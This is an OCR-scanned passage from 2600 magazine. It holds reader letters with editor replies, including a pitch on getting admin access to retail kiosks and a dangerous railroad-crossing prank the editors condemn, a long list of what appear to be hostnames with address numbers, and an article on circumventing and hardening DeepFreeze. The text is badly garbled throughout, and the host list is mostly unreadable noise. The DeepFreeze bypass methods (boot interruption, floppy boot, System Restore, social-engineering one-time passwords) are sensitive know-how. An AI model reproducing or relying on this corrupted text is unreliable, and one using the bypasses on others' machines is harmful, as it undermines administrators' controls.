the airwaves as they can get without incurring any ex- 
tra fees. But jot every listener on the Internet (which 
id ready carries a bandwidth cost for each stream), an 
additional fee is levied Imagine what would happen if 
stations were charged that fee for every listener esti- 
mated by the Arbitral ratings sen' ice. The most popu- 
lar stations would probably go broke. { Maybe it’s not 
such a bad idea. ) 

Dear 2660: 

I was wondering if an article about OfficeMax 
would be of interest. I've read the articles about Radio 
Shack and recently the one about Target, and l was 
v ondering if your magazine would he interested in an 
i i ide about OfficeMax, Things such as store security, 
breaking through [he security on the HP Custom 
1 ompuler Centers/logging in as administrator, the 
mi ix terminals, and other related topics. 1 would be 
in tc than happy to submit such an article if it w r ould 
In of use. Please let tne know so I could gel started, 
thank you. 

(ianjaf I 

if we print an article about one retail outlet, natu- 
■ dt\ we're interested in others. That's not a guarantee 
« we'll print this specific article hut the topic cer- 
ntdy qualifies. The general rule of thumb is that If 
m tm i e an article to write, just write it and send it 

We may not print it but at least you will have writ - 
i *! a which is generally a good thing to do. 

nr ar 2660 : 

f ihink that your magazine is the greatest, I read it 
ill du time at my local Chapters Bookstore. \ always 
v I n cover to cover. It's the best. 

I have a situation that 1 don't know what to do 

ii hi my neighborhood we have a fun game. We 
i ms on the railroad tracks to make the traffic 

i rn i mu come down. The winner is the one who 

• A the longest lineup of cars. 

I i i week I was sure f would win the contest. I 
i . i ii i busy day at 5 pm, I did everything properly. I 
: and came back an hour later to make sure 

* I bail the longest car line up of all my friends. 

1 ambulance in the stuck car line. 1 feel 
> mtv guilty about this. What should I do? 

Tony 

1 vi 'ii feel compelled to ask us about this is a 


bit puzzling. Do you think a hacker magazine is going 
to go any easier on you for being a complete moron 
than any other pan of society? Not lifaety. We’re inter- 
ested in how the technology works like most everyone 
else reading this. Bat there's a rather major difference 
between that curiosity and an action that puts peo- 
ple's lives at risk - not just people stack in traffic in 
ambulances bar those who decide to ignore the harri- 
ers after waiting for a very long time. You can t do 
anything about the past hut you can put a stop to this 
crap now and in the future be fore ir really blo ws up in 
your face. If that actually got through to y ou t he sure 
to share your enlightenment with your friends. 

Observations 

Dear 2600: 

A few weeks ago I ordered the DES encryption 
shirt alongside my subscription of your magazine and 
received it all without problems, i haul s for the fast 
service, but., the shin doesn't seem to feature a DES 
Encryption schematic to me! Thu day before yester- 
day 1 had dinner with two friends who questioned the 
schematic to be DES. So when I had the time yester- 
day night 1 read through Applied Cryptography and 
found out DES i* not working tins way. Although I’m 
definitely not a crypt analyst ! could tell something 
was wrong. So I searched the book for more algo- 
rithms and learned about the IDEA algorithm. Its 
schematic looks almost exactly like she one on my 
shirt. ITte re's only one difference: The XOR and Ad- 
dition signs have been switched in the explanation on 
the bottom of the shirt. Now I'm confused. Is this 
thing on purpose? In a quick search on the Internet I 
can't find evidence on this, so I’m still confused. Can 
you please help me out on this one? 

Freddy 

You’re right about the IDEA algorithm. As to the 
reversal, perhaps it s one of those mistakes we keep 
making to keep people on their toes. 

Dear 2666: 

I just found out something quite disturbing at my 
workplace. Pm an analyst for a major ISP in Canada 
and I had an interesting conversation with my friend 
at the abuse department. It seems that the RIAA is 
pressuring us to shut down customers who have been 
involved in tile sharing, especially on the Kazan net- 
work. Apparently, the volume of threats by Lite RIAA, 
Sony, and other organizations is around 1000+ emails 
per month- They are receiving detailed logs with IP 
addresses and the names of the tiles that have been 
traded (even though everyone knows it's no proof) 
They've installed a new script on the Radius server lo 
break down logs in smaller chunks so they can he 
searched faster. Needless to say, that is quite disturb- 
ing, So far. they have not shut down anyone, only sent 
warnings by email to the "offenders. 11 They're in the 
process of deciding whai to do next. I'll keep you 
posted, I thought you would find this interesting. 

Quebec 

It might he interesting to find out exactly how 
they're getting these logs in the first place . Are they 
perhaps running some sites of their own ? Or is your 
ISP monitoring what their users do? 

continued on page 48 
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maes-aithur alc-ha 114.1 3 3J 
maE-a-Bsiro a>pha [14 34] 
moss-bamhi alpha It* 7Q| 
m(T94-ba4h1i*l arpna 
It* i£B] 

T-dSE ■ t"l SS. QriQf' |26 41[ 
TFHis-a-bast.lv-' u [3 35] 
<Fioaa-batman alpha 114,66] 
moafi-bwdnil *3pKa 
[14 192] 

rTlCIBB-tlillJleh tychb [3204] 
moBB-hHler.aricn *S| 
mosa-Cilotidrin lychp |3,29] 
maas-blo'^tlFh .lycho 
[9.2011 

mosB-blLfemoon orFon 
[26.22] 

mrjaa-budlce.ermn [?<i 97] 
moea-huti 4llp.ha [M l0| 
mos*.cape&hark. Lychd 
[0 28S] 

■t asc-CATlubery -nr'un 
(20.301 

•rtdaa'CHFp sycho |9.l£] 
'n-PEa-calarpie alpha 
(14.139] 

IFKKS-CaUln.n ti^he [3 2J9] 
tTKida-tdbiurnpr Jvlp+14 

(14 1491 

mpsa-chs-Eeie alpha 
[mi B7| 

mosa-chip alpha [14 1 £9] 
FF1p«-dc1*iry nlpha 
[14 179[ 

moBG -clov- nhfih .epe-eft 
[25 20] 

moas-cod*c tycne [9 OR] 
moBe-eunlbrnnca typha 
[3-301 

moss-cPDFB.ori-Dn (26.13] 
mosa-coppes epoch 
[25 lit] 

m5sB corona anon |2fi.3!| 
mcEa-CBypse. alpha [1-1 103] 
mcEE-crab lycno [3.68' 
mDEB-Clab.lyCFHi [9 74| 
mOSB -CrApple. lychci [3 gM] 
nt0M-euin*r.0FttD!£6 n8] 
ma**,.daffy. alpha |14.7fl) 
mcsa-dag.3ert:5h .lyche 
13.27] 

(ft&sa-dalb rtlph* [H.SS! 
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rrOBG-dnvil.fl.pnuh [25 17] 
mDGB-devUhsc lychn [0_SQ7| 
mosa -digkrft alpha |14 iD4j 
rhOSa-tks: a Dha [1-4 343| 
mo=9-itoffiinlcrti .orlori |26.39[ 
mo»tttapiy. nlnha [n 129] ' 
moas-drownm alpha | G 4- E'7B| 
mu sa-Arty. alpha 14 114] 
"1 £Hsb-quvl i I. anon ,28 S] 
mMa"Plr*ivr;i irlp'-fi 14.21 3 1 
moM'draVilythO 3 45] 
mosa-fatoaa, alpha |i4 401 
riMMa^farD anon |2G 11] 
mps[l-)i!ii* is |>h-.i [14.1 31) 
mCiFS-flWh js6pha (14.3?) 
maSG-flpunnlar EyiJfcb |3.?10] 
nUMB-loghorn uiphfl 114 M0] 
!tiM6-1afdham.opon [36 40] 
rtipofl-lrsarfi. epoch [24.110] 
mcse rfrogFinh. tychfr [3 .9 1 1 
rooE-E-gatora (?5.9| 

moss- gaby. Tycho 1.3 57] 
nwaa-gorir: u& alpha 1 14 3-H| 
rmtp-ijtiJdBan j Ipna 1 14, 148] 
mosr- g0*df is h I yaha [3 70] 
ir-oss -goody. mplm 114.84! 
pwas- group Bf.tyrfw |3.17&> 
maas-gj Pinoy. alfifca |*4 >65] 
FnO5B-0U.rtiPy.4lptlJ. j I 4. £71] 
•noM-r»nirti*irtith,iyche [3.25) 
■Tia-aa-nappy fi ; om-i T14 144| 
fria-se- “ Liunre alpha [14 1 9aJ 
iti&Ki-isolnefcflo.-DrhDn pb 1 04] 
mSsa-ftormUHa&.lytha |3.7®[ 
rflo*s.-h(inevh'nvvri bran |?8 i?3] 
moes-hypnd alpha [14.72| 
moss- aamina .alphn '14 M7[ 
mpsa- awfiah tyeho 13.119] 
mote- ayhawk apse ft [25.1 9] 
moSG- cilyi n ; yeha [3 2CQ| 
mose- '.gglypuU alpha [14 i99J 
-mose-kanga alpha Ii4 fipj 
■mo'aa-ttorrge.. orion | j Q. i 00] 
fn[ik5-kri>Blt.Ofltir-. [20.25) 
mWi'Bln flfphfl [14.194] 
me-ss-lite erkm |26 16| 
moaG-iobsEar.Ivchc 1 3 1 8 1 
ifiMS-louio. alpha. [ 1 4 . 1 1: /) 
inoM-lyi*tfti| .tycho ] 3.24] 
mesa madknrn lyghn [3 Ej 
mose-maio .tycho |.J 33] 
nnt^a-mflivdann tycho [3 48] 
mw marvm. alpha | * 4 108] 
owes-- meSwUT a Iphn [14.110] 
noGs-mophtilp .njj'i.i *j4| 
ma&s-mod .orion [?G I 1 4] 
maao-mnUielob. -orion |26 1211 
ir ..iP^-noLhay a'pf’a |H 
moss fmcMya Open [20 19] 
moss-millfsr (jriCrfi 1 28 103] 
maaE-milo. alpha [14 i S 1 ] 
mtMB-mDda#o.prH3n [26 Hi] 
mQSS nwlhiifc tyCPo 1 3.2*3] 
mo5&-rnph»dn *M«i (2fi,1?0{ 
mMB-mulan alptwr ] 1 4 150] 
inpaa-munphy. orron [26 fl] 
fflO^B’ihultlsy alpha [ 1 4 . 1 5| 
mOu -nfSn EycNa [3 220] 
moE-s or In pup Tycho [3 56] 
mosa-olivawl. aloha [H 14| 
miisa-o&car alpha [14 Ttfij 
Ifloss • p*l alpha 1 14 24 1 
n»55 • p a fA HA, a Ip h * [14 21 1 
moss-patch alpha [14 141] 
moss-pace alpha ] 14 i£2j 
moaa-pigiel alpha |ifr 1 7H | 
moia-pdanar.tiricin |2fi 42] 
moss-piranlni lycho [3 36| 

mosa-EHeahla'y.alphfl. j 1 4. 150[ 
inosa-ptaep.tycho [3 44 1 
iriras-prfikty.a Iphil ,1 14.20,1 
rapts-pnoyis .atphu [14.1AJ] 
runs* pooh nlp)Mt |T4 79] 
mosE-po-pBya. alpha [14.EJ7] 
moas-rZI scare orion (28 I07[ 
ipdfrf-rwnbow.tyeho [3 1041 
mosE-rontlflM. ilfJui [54.53] 
moaa-radflla vPpha [14.1 fj4| 
moflB-rodhooli .OriOh [!j*i 1a| 
moBB-rc-d&rnpfl.oric-r il£] 
ittcsa i nudi unner a ipha [14 1 90| 
rmMjj rdonlphis [14 163' 
rnoG-G- roz alphn 1 1 4 1 09 1 
moa&- Guppora. orion I2B 43] 
mPBB-Bcailop.lychn |3.5Q] 
mo w-ntooby. alpha [14 40 1 
moaa-HcrappV-a Ipl^a ] 1 4 . 1.36J 
■TioBB-scuriin: alpha [14 S3] 
fflGsa-ae-iPri&s.lyc^o r3.1?Pi 
moaa-aeflhDrEpa rydw 13 35| 
ftKjaa-siWirtMd.tycrws 13.70] 
anjwahnrlt.lyChd [3 40| 
mOES-Gh4K:*!Brp flpgeh |25.2I] 
nH)E&- s-'rreh alpha |T4 7 05| 
iiMJisft- ailyerfiah. tycnc ]3 147! 
ragBB^irtma. alpha [14.90] 
nvo&G- &*!fl|rjck T 1y[rh£j [3.471 
mp&a Gisapy aiph.n [14 Mi] 
mpaa-GnBlf.lycho |3 200 1 
rnor-K-r.iieaZy alph.: |14 146] 
mgsa-anaopv.alphs ; I 4.47! 
moes-*ncn!B!i .nipha [M 134] 
maas-GOI o*ipn [SC .341 
<na4a-aapfleTE.«pach [25 14] 
■TipjLs-spiiGriTMn alpha] H i0.5| 
mo:-J : :;pin1 Jltjhti 1 14 I 
mosa-S'qoiriia Alpha [1 4 137] 

iTiPaa-starfiGii lycho [3 42] 
mQ£&.-sljk;h.a pha [14.1&6| 
mo»s-:tLrlpp«r.Jyc»Ki [3.I9J 
rno5B-Mur0non LyChO [3.58] 
mosa-surrltiT lychg [34] 
•noM-sulSey. alpha |M 63J 
moQS-ahord'iih.tychD |3 154; 


rtlnejs-iartdy.tychO J3.60] 

moso 1A? A pha [1 a 35^ 

moss -lernnnats* ortO« So- 1 22] 

mosa-lefra tycho ]3 35 
moaB-^iumpeJ alpha [14 7i| 
rrKu4 l-Lig^r 1 alpha (H B9] 
m<i&^ I rig.^gr.lyChO [3.1791 
nTOBa-njure .1yc*o [3 112] 
n» Ea-lw#e[y. alpiia [14.1BSI 
mQaa-rAJDl&dtea.onan [26 l£4| 
rr OU-atChln .fytho [3.124] 
mosa-vnoidhnh tytho 13-71] 
masB-vohorb alpha [14 i'j0) 
(noGa-vulpm alpha |l4.fiB] 
moi4-*ail4ye.iychn [3 104^ 


rr osa ■ tt nrMLtflri^ 1 oridfl [20.44] 
mnss ■ wawInfl.JUpha |*4 1S7[ 
nvoas' whatoitycho [3.2271 
mpsa-woacDi'.'ok or»on |26 401 
rhpat - yuerigll ■ -u Or Oi 1 [26.34 : 
moSB firtin phOfl [26.1171 
mnss-zorra alp4iM [14.4$| 
Tnrprtt [34.11] 
jfipalcatano [1 23 Z0| 

- -nrity 1 127 1101 
nBouiu Hi [UT2 120) 
nsa&GJiu |1 C7| 
natlonalpark | »5l 130] 
naulilus [40.106) 
navalmoiiMnl |4D 37| 
nearfpluro lln 1 1G7.49J 
nabo |32 22 1 
nelliva [05.41] 
nHlour |05.4U| 
nolorie [0S.37] 
nfft«TV*n [55 47 1 
flols;n [IB 42] 
heritsra* [65 39] 
nMAn [40 167] 
ontrwo [05 116 1 
noum4.n |34 9] 
newcafofly |t 59 173] 
nawapaper [154 >46| 
na^ioasl tyono |3.&0] 
niflUHJOflJl [2WJ! 
riminpoolll [20.- I ] 
rnottipool 1 3 1?04 125) 
numhpaoTlS 1204. Hi] 

! »fi Pi pCl'J 2 [204.^1 
nlhlup«425 [204 25 1 
n nth p 00*26 (204 20] 
niothpooia rscH.a 
ri.iithpoolfl ^204.4 
ii-hihpoulf. 204.5 

rttnihpooie 204 b 

hinthpool? 4 ?i? 4.7 
flinihpooiE 704 & 
i’.inlhpppiBS [204 d5 
ftinlhpdoH3 [204.U3- 
nlniripgnrlpil [204 10] 
fiirufloa [s 2] 
hlBc.radPum j73,i33| 
npg apooh |25 E4) 
ngrpUff 4a [16«.t2B| 
noofcSBCk |nr, 0 1 j 

nolacahlh [40 471 
notlUngoti 1 156. ’63 1 
udYHbylla 1 152 13[ 

cilyrnpijv [ t . 1 3[ 
once 176,12] 
ohephed 'fs [10? 62] 

CMvalap 164.66 
Ohl [1.45] 
oriftrhbrin (04,21 ] 
onrarrip ft 2. t v 
opahcoumry [-00 10D] 
upricaogla [32.65) 
npEral0l4-12q69-3& (150^11] 
ortHbodipflo [1&2.73] 
ordeaitiBr*. [&< 07[ 
andBalbaah (04 .263] 

$rlglB9 i 13- 3 . 91 
orirjrt *Cll(rte [102 112] 
onmtl [1 ?i] 
oacan [32 40] 
pajaon ms 132.60] 
gEhaicard [91 .0 1 
nrhBiploio J4O.105] 
oEheTiKorfci !64 12&J 
oijlpoioo | i r *0 l 33] 
ou=si-Je [45.11) 
owl [15 133] 
oxlrowlakfl [153.1441 
cjib-raho [153.140] 
oxlEhca [153 1361 
Ox1C.nl 1 45 14| 

OyWOfUad (40.103 1 
pflChuc Blflnk |1 76] 
pacilkOesii [134 
pacil!Cidsali4 s94.i4 
pauii-cJearsi iy-i 21 
pagj.ftas*al22 194.22 
paciligd*dl?e 194.20 
paoliDdo;i'40 >14 45 
pB£jhpdaal52 [1 94.52; 
pa-uhPdaaJB [ = 94.61 

.. .Li.-ru .il-: .I.iig 1 13A.60 j 

pnfiFirdn al97 [ 1 04 97] 
padJeshaH |40 i50J 
painledduck [190 1?9] 
poJaanlBd (1 14 106 
rai=)dnl07 114 197 
PfllBahl99 114 195] 
paiaan20<3 ! 1 1*.2O0| 
paiaan202 1 1 + 202, 
ffltiaanal [114 1B2| 
pal*aw10(114.1&5 
saieahglT M14 103 
ofiisanol? H4 IS- 7 
paisarol j 114.193 
limauJlti 1 4 114.175 
pgig.innl 5 114.172 
p ai oa-n c T 6 H4 160 
paisapol/ 1 14.T71 


paisanolS [114 1d9[ 

paifianoi9[H4.2»S 
paisanoZ [114.200] 
pHiufjrnJZO [114.163] 
nnlAArtci?l [114 1SBJ 
oai-sno22 1i4 1701 
palaano23 114.210] 
paiaanp24 114.177] 

IJLii nnuZ 114 207] 

114 171] 

parsanaS in 1h7 
pa^sariQO 114 200 
[ilI !: .lliU r 1 14 !50‘ 
gdiSprlOfi 111 174 
PBIITnihpFJ 114 1 76 
DaiximapnHy | S 73] 
nalG.c 332.52] 
paMbwef 1 123 30 1 


pallgraifliaO 726 130 
ptflgrewTai 126 131 
paJlgra&a>32 i2fi 132 
paFlg<asBl33 i2h 133 
pall^rasGlld 120.134 
P4 I|qt 4*«13& 126 135 
pal|(FaE5l36 176.136 
EJ8llgrassl37 1?0 137 
pall^rasGlBfi 126.1 3fl 
g..illgraasl39 126 1 39 
paltgr«s4£00 |l 20.209’ 
palk)naf 5 210 Tt20.J10 
pallgrHBs211 i26?nl 
Pumps i’oas 02.4] 

;innda | '■ 40] 
n.ifldornpraum |32.10| 
paradtpfl F 1 .9| 
parasmi )40, !42] 
pamdlze ]90.301 
paaaagaies 64 165[ 
Mt*4agaia.3 E-l 1fli[ 
paGBA3»217 [64 P17| 
pasEjgsboaE |*j4 if.i4) 
pasaagabaalZ 1 9 |64 2 1 9] 
paa°.4gahawli ;64 I 53| 
paEBpecp [45 16) 
palnro ]3?-3] 
pawphnr |r&0 146] 
paxEhan ; J 2 62 1 
payday di 112 1 (213.21 1 
pc? 147.2] 
prf 47.3 
pc4 47.4 
PP5 47.5 
p£0 47 Q 
pc7 47 7 
ped 47 d 
pc9 47.9 

paar alpha . M 50] 
P4*rigriiy1 151 i] 
pearlflrflya 151 S] 
poartprayO 151 3] 
OBdf!-gray4 151.4] 
un.iniiliiyD 151 0! 
(»Briyrav0 1515] 
penri^jrAy? 15i 7| 
oearrgnayfi 151 0] 
paa> .ji a / i 151 9] 

POdr jrn* (150.139; 
P0EP»O.1.,ooiip5« [1Q2.1T4] 
panic [32.231 
peppaMnrtlBI 19 It 5, 
papparykriilizg [9 125 
pDE7pnrvkntll31 9 131 
p(K?P0ryknd.t33 19 132 
pfloporylinitl 93 9 133 

p€pparvkn3t!4? [0.253 
f :r.-ur«'ivr M‘52 0.152 
[Mpporyfeninss 9 156 
poppa ryknin 57 9i57 
papperytoifll S4 9.tfl4 
pappflrykhil199 9. 1 99 
peppflrvhriU206 3.206 
pgrilpi glial 0O 592 1Q0| 
perilpmnoiEi [9? 1?fl| 


perilprunoiSI [9?.126| 
parllprurvaS? [ri2 57] 
par 1 15& [102 140) 
pBlddam jGC1.73[ 
ph.gn’ir.Ti |> 6C1| 

phiHiaa 1 33 27| 
plrkiLste- 1 153 23] 
-pigeonwpod (64.2 T3j 
pirifl-kn&h alpha [14 73] 
piniayljg [101,129] 
pinssyl 30 1 191 130 
p0reayT31 19T.131 
pmsay132 191132 
pinuy133 191 133 

p<nflay134 191 134 

pmaayl35 191 135 
pmaaylSB >31 136 
jUnoayW E91 137 
plnwy13a ItBI.1 36 
pinsnylag <91 139. 
pinaavl+O IB-1.140 
pinaav in 1 0 1 . 1 4 1 

plrlday 1 44 19 II 44 
pir-n-py l 46 [101.140 
pimayM7 491 147 
piiway E+0 [1 9i , 1 40 
pi "-say 1 49 101 149 
plrttay150 191 150 
pittwyBH [101 209 
phwaySIO 191 210 
p-nsayZT. 1B1.2H1 
p»n»ay212 191 212' 
pm&Ay215 191 21 5) 
pil [1 70| 
plague [32 *7] 
ptanal. aclipES 1 162.77) 
plant if I [6 06 ) 
pFjgriigigpe [40.461 
ptomernOia [ 1 53 1 32[ 
ptuahtail 1 1 53 1S3[ 
p«ushLBiii53f 153,1651 
piuBhtail156 'l53. 15eS 


pig*hl(ill150 153.153 
ptuaMainSf 153-159 
pJuHhladlili 153 10? 
pluchi.,1 =153 1 53 103 
plgahlfl4164 153 164 
:-.IudFi1a.I 165 F 53 165 
plirehwiaio >63 210 
pluah1a42f2 153.21? 
plusny 12 [155 1 2 
nkidh y13 155-13 
pluphyfll 155 91 
DluEhyhye 11 S5.2&] 
pluBhylour J 1 £5 8[ 
plu^riyona | >55 .4 1 
:.lu..hy;li , irt [155.7] 
pluflhylwn [155.6] 
pluln WtlSlahm [111 1 □ | 
pmi'rier 1 64 701 
pgtaria.acItpM |ID2.66] 

pgiigiidpg I551tt| 
pcnlyann-u 45 1Q| 

paonbear p23 1 16| 

popi [34 3 
p <frdicl.il* 163.1] 
pKfrttwrt*; [193 1 31] 


pcinral | ’03 4 1 
p rnmethttis .=t 
piornalhBHiBl | 
^rgmaineu*2 I 
prnm |1 56] 
pc-21 ;i23 ?i 
p&27 [l?3?7] 


inch [?5 40] 
170 1 1 


pafrO-ipa | 
ptPlfriny.irii 


123 4D| 
phi 1 14.130] 


puddyl |3*.12| 
ppisar.vdipan [102.07] 
puratihmi i54 13S] 
pmnchbm 1 42 [ 1 54 i42| 
punchbrn? [154.140 
PUnchhmZ [T 54. 137 
punchh^n4 154 130 
punchbmS 154.134 
punchbme 154 iyo 
puriuhCHn? 154.139 
DUMWOill [154.146] 
punghigil 4ft ] 1 54 1 4fi| 
puwbbcuia [154.147] 
punchbojiZOg [ 1 54 .?0&| 
pUhdhbQk21E I 54.2.1 1] 
punghbgk?12 1 154.21 2 1 
punch&g)(3 [154 14&] 
punchbDK* |i&4 1411 

pUri-vriDPK0 [J 54.244] 

pgppyl 1 155.137] 

pinpalcrry [1 3| 

(i . Grk eclipse ji 0? HI | 
Q.anzglnss [6-i 31= | 
quBitzglaasBO ]54 56] 
guar!fyliias55 |64.05] 
d-gickolnfog? J10S 7] 
(UlielUB [1.09] 
r52-wyn.Ha ji52 12S( 
■idaigaral ; 39. 1 30] 
-nriAi|iflflcn [109.93| 
radar* ax 89 1311 
:adaifrab 0U 10?- 
uadnrwaad: (09.1 33] 
nderwart 00.135] 
rariar^fllt 80 t39| 
rabarwBiT fli> 1 36 j 
radra alarm [106 2.^3] 
rail |4ri 10-1 
raidai im ]162 12®| 
ram barrels 2 [155.32] 
raanbarroi0&[1S5 89] 
rairib-arreig [155 2 j 
rfriairtfcangl 29 [206.1291 
r^isinbung^O [206.1301 
raisinbongl 3 1 [206 101] 
raismbongiae 206 s 30 j 
l Bifrihtwrhg 1 37 206. 1 37] 
raisinltongTifi [2D6.130] 
rarBinbon&l 39 206.1 39] 
raismbcnai'tO [?Q6 i4tJ] 


raismbongi 'iri |2rn= i .|ri 
raiElnbcngi + l tZOC 141 
Mibincuiig ■ ->2 rafif 1 42 
-i.vir.inJsufKj *43 [206.143 
ra.iEin4>gngn4 [206.144 
raiamUonij 1 4S [206 145 
rolalnbnnpHS -206 M6 
rjEatobongl 47 206 147 
raiilribg4^|14e 200 146 
fBWTlbgwSl 1 49 206 1-J9; 
raiBrntjongiiiO ?D0 150 
rais nbcmgl43 ,2 u>j IF>3' 
Eihunbong 1 54 [206.154 
rill" irit:.|]i 11 j ! 5fi [20=6.155 
saisinftgnotOa [206,156 
raisinbansj s S 7 20SJ&7 

■ aialcbanglbd- 20D.15S 
raifli -.hung 1 59 206. 1 59 
rmsiobDngieOpOB 160 
mmihbnnBiftI 2W 161 
raamboogie? >266.103 
raui nboeg 1 63 268 18? 
1.1 ■; nbo- y lei 206 164i 
r .,i _ ~ r 1 1 : ■ 1 1 16(7 [20Li 167] 
ratfinbsnnlOB [206 166] 
ratH.nborig 1 70 208 170] 
fasunbong 1 71 ZLlfl.lTI] 
ruibihbongl 72 206 1 7Z 
rajnintwrig173 306.173] 
rai&inbonjf?O0 [306, ?0B] 

■ aiEinbongiZlO ZU"! 2 1 0 j 
1 alfrlmbprig31 1 260 211] 
rflrvnbanij?! 2 ]2D6 2l 2] 
r®6Jnbono?1 3 [206 3? 3] 
rarEmtK.ng?i4 [206?14| 
ra:s=nbong2l5 2D6.?t5] 
r4imntHing2IE 1206.2 = 8] 
ifljalnbofigaiT 206.21 7 1 
raisinbgnbfiia [206 210] 
raPBlnbonnfi 1 0 [2Q6 ?19| 
4BialnE>pn?2£0 [206.220=1 


raisin bon 5? 2 1 [2M.391J 
raiL-iit-nngSZ? [200.222] 
raiihfrsea radium 3 ,2] 
riirrmnos IfiStara-a ITB IOO) 
rampariJjle [166 131 1 
rarr-pyalipy ]l0fi 13?] 
rarigeafialler [O* 83 1 
J .LlUt:- 1 [45.13] 

|61 10| 

TaltlewhalS 1 33 [01.133; 
raStlawhala 1 33 [01 133 
rii!tla*h.ala 134 61 134 
1 dll Iflvrhalel 35 01 135 

r-BhlewhAlgl 3B 61 136 

ratiMwhaleISfl 61.130 
rarile whfllal 40 61-140 
■adiewhaia 141 6i i4=, 
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by The Ratline 

WiLh the past few issues. I’ve noticed a few 
queries about a program called DeepFreeze. Be- 
ing someone who works with it on a day to day 
basis, I thought 1 might clear up a few murky ar- 
eas and discuss some of its features/drawbacks 
to help illuminate both users and admins who 
might be using this software, 

DeepFreeze is a program made by Hyper 
Technologies (ww wdeeplTeezeusa.com) for 
Windows platforms, and is designed to be a de- 
terrent to "hackers" (quoting the website here), 
virus solution, and maintenance tool. Essen- 
tially, what the program does is lake an image of 
your hard drive on installation and "freeze" the 
system, making any changes to the system after 
bootup temporary, I have been hard pressed to 
find something DeepFreeze couldn't undo al ter 
taking basic precautions (more on those later). 
Formatted drives are back on reboot, programs 
installed over a freeze are gone, a virus can even 
infect the system, and on a restart, it will be 
gone. However, the computer isn't permanently 
frozen. The program can be uninstalled of 
course, once the computer itself is thawed," 
but DeepFreeze can also temporarily disable it- 
self for a time so that one may make changes as 
needed. li quickly becomes apparent that it is 
vita! on installation of DeepFreeze to have 
everything perfect on your computer before 
freezing it. Disabling Deepf reeze can be a pain 
in the ass and time consuming, so geiLing a 
good, clean, working install right out the gate is 
vital. Obviously, for an open lab/school envi- 
ronment, DeepFreeze is incredibly useful in 
keeping computers running with relatively few 
problems. Unfortunately, I haven't taken a peek 
under the hood as it were to see just how Deep- 
Freeze does what it does, but my bosses and I 
would be very interested if someone out there 
would take a look and get back to us on the 
mechanics of the program. 

DeepFreeze currently has three major ver- 
sions that 1 am aware of and have had experi- 
ence with, two of which are outdated. The first 
is a standalone install, usable only in a Win- 
dow s 95/98 e n v i ron me n l . Th i s ve rs i o n is d t Her- 
ein from other versions in that it is the only one 
to have the disabling process before windows 
starts up. Watch the computer boot up. The w in- 
dows splash screen should pop up for a moment 


before going to a black screen, and in the upper 
left-hand corner of the screen you should see 
five dots appear, one second apart from each 
other. This is your opportunity to hit Ctrl-FH to 
access a password prompt. After entering the 
password, you have numbered options available 
to you in a text screen, which you access by hit- 
ting the number. You can continue booting the 
computer, boot the computer thawed, or change 
the password. These are all pretty self-explana- 
tory. Note that this version has a few haws in it. 
You can Ctrl -Break during hootup, either to 
mess with how Windows starts up. or even in 
theory to prevent DeepFreeze from starting. (1 
haven't tried this yet; we migrated away from 
this version pretty quickly.) Next, you have to 
thaw the computer on every reboot, so once the 
machine is thawed, you can keep it thawed by 
doing a soft-reboot in window s (left shift as you 
click okay to restart on the shutdown menu). 
Double-clicking on the frozen icon in your task 
tray displays ASCII text as was mentioned in an 
article. This is text used for One Time Password 
(OTP) generation. Basically, this version allows 
you to call up Hyper Technologies and give 
them this code, and they reply w ith a password 
that is usable on that machine once. You can 
then reboot, use the OTP, and reset your pass- 
word, Obviously, a little social engineering is 
all that's needed to defeat this. Hyper Technolo- 
gies must have realized this, because it doesn’t 
use this system anymore. 

The next two versions of DeepFreeze come 
in two different flavors. The first is Standard, 
which retains the stand-alone method of instal- 
lation of the old version and needs configuration 
on each computer. The second flavor is the Pro 
version, which comes as a console package, 
then creates individual, tailored. The two re- 
lease versions more or less are identical, the 
only difference being that one supports Win- 
dows through Win2Q0G, and the most recent 
also supports XP. 

The console is kind of nifty. On install, it 
asks you for a siring to make the console 
unique, so that one console won't affect every 
install of DeepFreeze out there. After that, it 
gives you the ability to create diskette-sized in 
stall packages for your computers. By default, 
there is no set password, nor is there the ability 
to set a password. Default settings use only the 


< )ne Time Password option, relocated from Hy- 
per Technologies to the console However, if 
you want to have a static password, you have 
i he option of setting up to live and the option to 
change any ol those five passwords. You also 
have the option to freeze individual drives or all 
drives to schedule "maintenance lime" (times of 
day where the computer reboots and is automat- 
ically thawed for a set period of time), an idle 
reboot timer (after x number of minutes of no 
key boa rd/mouse activity, the computer reboots 
and refreshes itself in the process), the opportu- 
nity to create a "ThawSpaccU which is basically 
a mini-file given a drive letter that isn't frozen 
by DeepFreeze, and the ability to lock out ac- 
cess to the dock/calendar, and disable the Ctrl- 
Break function at bootup. After all this is done, 
\ou save the configuration, create a setup file, 
and zap it to your diskette. You can also disable 
I He freeze icon in the system tray, forcing the 
user to use the keystroke combination of Ctrl- 
\ll Shift-F6 to get to the password prompt. 

On the computer side, the computer now 
boots up frozen. If you hold down Alt-Shift and 
double-click the freeze icon (or use the above 
keystroke combination), a window will pop up 
prompting you for a password. At the top of the 
itidow, you can see your OTP token to gel a 
p is sword from the console, as well as the ver- 
lon number. The latest one I’m aware of is 
■ imewhere around V4.20, Enter the password 
1 1 id you get three radio button options with the 
"iv labeled "status on next boot. The options 
,ne "boot frozen. " "boot thawed for X reboots" 
X is configurable), and 'boot thawed" t until 
oil say otherwise). Also, it appears that the lat- 
est version will automatically allow the updat- 
ii of daylight savings, without having to thaw 
M computer to change it. Perhaps this is the 
reason Why DeepFreeze wilf block access to the 
lock now. 

Uninstallation for all three versions involves 
thawing DeepFreeze. With the first two versions 
"U van then go to the control panel and ad d/re - 
move programs and remove it that way. The 
most recent version now requires that you run 
the setup file from your install disk with Deep- 
v/e thawed for the option to uninstall, so 
>n't loss the install disks after you're done with 
i hem, 

I here are still sonic issues with DeepFreeze 
1 1 I doubt can be avoided through program- 
ming. First, naturally, is the observation that 
hooting to a floppy will prevent DeepFreeze 
in starting. Any admin worth his weight will 
in off boot from floppy and password the 
BIDS to prevent tampering as is. Second. Sys- 
m Restore in Windows XP has the ability to 


uninstall Deep Freeze, even while it's on and 
frozen, by simply restoring the computer to a 
point before when DeepFreeze is installed! It 
basically docs to DeepFreeze what DeepFreeze 
does to the rest of the computer. Any sysadmin 
should disable System Restore in such a public 
setting as would justify DeepFreeze I mni being 
used. With those two precautions in effect, it be- 
comes very difficult to get around DeepFreeze. 
With the implementation of a central, unique 
console, security involving the OTP is a little 
better (admins have control over it now at least). 

Finally one note on the usage of DeepFreeze 
on NT based machines. For some reason, Deep- 
Freeze seems to be dependent on the SID. In an 
environment that uses image-casting software 
to deploy images to multiple computers, Deep- 
Freeze screws up royally after running SysPrep 
